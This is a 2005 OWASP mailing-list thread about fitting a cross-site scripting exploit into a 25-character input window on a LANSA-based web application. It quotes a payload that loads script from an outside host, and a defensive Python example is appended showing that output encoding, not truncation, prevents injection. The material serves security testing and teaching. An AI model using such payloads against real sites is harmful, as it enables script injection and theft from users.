[OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less

Eoin Keary eoinkeary at hotmail.com
Thu May 19 11:08:11 EDT 2005


It's enforced on the server side, an AS/400 box which is web-enabled by "LANSA For 
the Web".
Anything over 25 chars is truncated when displayed back to the user.
E

>From: Daniel Cuthbert <daniel.cuthbert at owasp.org>
>To: Eoin Keary <eoinkeary at hotmail.com>
>CC: owasp-ireland at lists.sourceforge.net, 
>owasp-testing at lists.sourceforge.net, owasp-chapters at lists.sourceforge.net
>Subject: Re: [OWASP-Chapters] XSS in 25 characters or less
>Date: Thu, 19 May 2005 12:10:09 +0100
>
>Interestingly, why have they only restricted it to 25 characters and where 
>is this being enforced and by what?
>
>
>On 18 May 2005, at 16:22, Eoin Keary wrote:
>
>>Hi,
>>I have a window of 25 chars to perform an XSS exploit.
>>Anything more is truncated by the server.
>>
>><script src=http://a.com/z.js></script>
>>
>>- this is 39 chars
>>We can do HTML injection ("<a href=....") to a degree, but has anyone any 
>>ideas on how to execute script in such a small window (25 chars)?
>>We need to stay in the same domain (xyz.com) in order to make the attack 
>>useful, so redirecting to another domain with the "<a href..." is no 
>>good.
>>
>>First correct answer gets a pint of Guinness (Larry S, you're not 
>>included for the pint as I owe you too many).
>>
>>Eoin
>>
>>_________________________________________________________________
>>More features, more fun, still absolutely FREE - get Messsenger  7.0! 
>>http://messenger.msn.co.uk
>>
>>
>>
>>_______________________________________________
>>OWASP-Chapters mailing list
>>OWASP-Chapters at lists.sourceforge.net
>>https://lists.sourceforge.net/lists/listinfo/owasp-chapters
>>
>>
>

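The point a defender should take from this thread is that the 25-character truncation is a length limit, not an output-encoding control: whatever markup fits inside the limit is still reflected raw. The following is an added example, not code from the thread or from LANSA; it contrasts a truncate-only reflection of the kind described above with HTML-encoding on output, using a constructed 20-character HTML-injection fragment (the `<a href=` case the thread itself mentions). The function names and the sample input are assumptions made for illustration.

```python
import html

MAX_LEN = 25  # the truncation limit described in the thread


def truncate_only(user_input: str) -> str:
    """Mimics the described behaviour: the value is capped at MAX_LEN
    characters and reflected into the page with no encoding at all."""
    return user_input[:MAX_LEN]


def escape_then_truncate(user_input: str) -> str:
    """Defensive version: keep the length cap if the application needs it,
    but HTML-encode the value on output so it can never open a tag.
    html.escape(quote=True) encodes & < > \" and ' (Python standard library)."""
    return html.escape(user_input[:MAX_LEN], quote=True)


def contains_markup(rendered: str) -> bool:
    """Crude check used to show the difference: does the rendered fragment
    still contain an unencoded tag delimiter pair?"""
    return "<" in rendered and ">" in rendered


def render_greeting(name: str, sanitizer) -> str:
    """Builds the HTML fragment the server would send back, passing the
    user-controlled name through the chosen sanitizer."""
    return "<p>Hello, " + sanitizer(name) + "</p>"


# Constructed sample (assumption for the example): a 20-character HTML
# injection fragment, comfortably inside the 25-character window.
SAMPLE = "<a href=/x>click</a>"

if __name__ == "__main__":
    print(render_greeting(SAMPLE, truncate_only))        # tag survives intact
    print(render_greeting(SAMPLE, escape_then_truncate)) # rendered as text
```

Running the block shows that `truncate_only` passes the fragment through unchanged because it is already shorter than the limit, while `escape_then_truncate` turns the same input into inert text. The length cap is therefore irrelevant to whether injection is possible; only the encoding step decides that.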




